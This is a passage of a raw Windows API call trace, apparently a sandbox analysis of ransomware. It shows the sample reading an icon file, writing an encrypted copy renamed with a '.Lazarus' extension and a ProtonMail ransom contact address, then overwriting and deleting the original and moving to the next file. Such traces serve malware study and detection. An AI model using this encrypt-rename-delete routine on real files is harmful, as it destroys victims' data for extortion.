RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0075.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0075.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.564] AreFileApisANSI () returned 1 [0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico", lpUsedDefaultChar=0x0) returned 43 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0075.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0075.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0075.565] AreFileApisANSI () returned 1 [0075.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67660 [0075.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0075.565] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.565] GetFileType (hFile=0x410) returned 0x1 [0075.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0075.565] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0075.565] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0075.565] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0075.566] CloseHandle (hObject=0x410) returned 1 [0075.566] AreFileApisANSI () returned 1 [0075.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0075.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0075.566] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.566] GetFileType (hFile=0x410) returned 0x1 [0075.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0075.566] CloseHandle (hObject=0x410) returned 1 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0075.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0075.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.567] AreFileApisANSI () returned 1 [0075.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0075.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0075.567] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0075.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0075.567] AreFileApisANSI () returned 1 [0075.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0075.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0075.568] GetLastError () returned 0x0 [0075.568] SetLastError (dwErrCode=0x0) [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e110 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0075.568] GetLastError () returned 0x0 [0075.568] SetLastError (dwErrCode=0x0) [0075.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69210 [0075.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0075.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0075.568] AreFileApisANSI () returned 1 [0075.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0075.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0075.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0075.569] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.570] GetFileType (hFile=0x410) returned 0x1 [0075.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0075.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0075.570] AreFileApisANSI () returned 1 [0075.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0075.571] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.571] GetFileType (hFile=0x42c) returned 0x1 [0075.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0075.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.571] GetLastError () returned 0x0 [0075.571] SetLastError (dwErrCode=0x0) [0075.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.571] GetLastError () returned 0x0 [0075.571] SetLastError (dwErrCode=0x0) [0075.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.571] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0075.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0075.868] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0075.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0075.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0075.868] GetLastError () returned 0x0 [0075.868] SetLastError (dwErrCode=0x0) [0075.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d660 [0075.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0075.868] GetLastError () returned 0x0 [0075.868] SetLastError (dwErrCode=0x0) [0075.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0075.868] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0075.869] GetLastError () returned 0x0 [0075.870] SetLastError (dwErrCode=0x0) [0075.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0075.870] GetLastError () returned 0x0 [0075.870] SetLastError (dwErrCode=0x0) [0075.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0075.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0075.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0075.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0075.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0075.870] CloseHandle (hObject=0x410) returned 1 [0075.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.872] CloseHandle (hObject=0x42c) returned 1 [0075.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0075.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0075.872] AreFileApisANSI () returned 1 [0075.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0075.872] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.873] GetFileType (hFile=0x42c) returned 0x1 [0075.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.873] GetLastError () returned 0xb7 [0075.873] SetLastError (dwErrCode=0xb7) [0075.873] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0075.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.874] CloseHandle (hObject=0x42c) returned 1 [0075.874] AreFileApisANSI () returned 1 [0075.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0075.875] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0075.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.876] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0075.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.876] HeapFree (in: hHeap=0x20000, 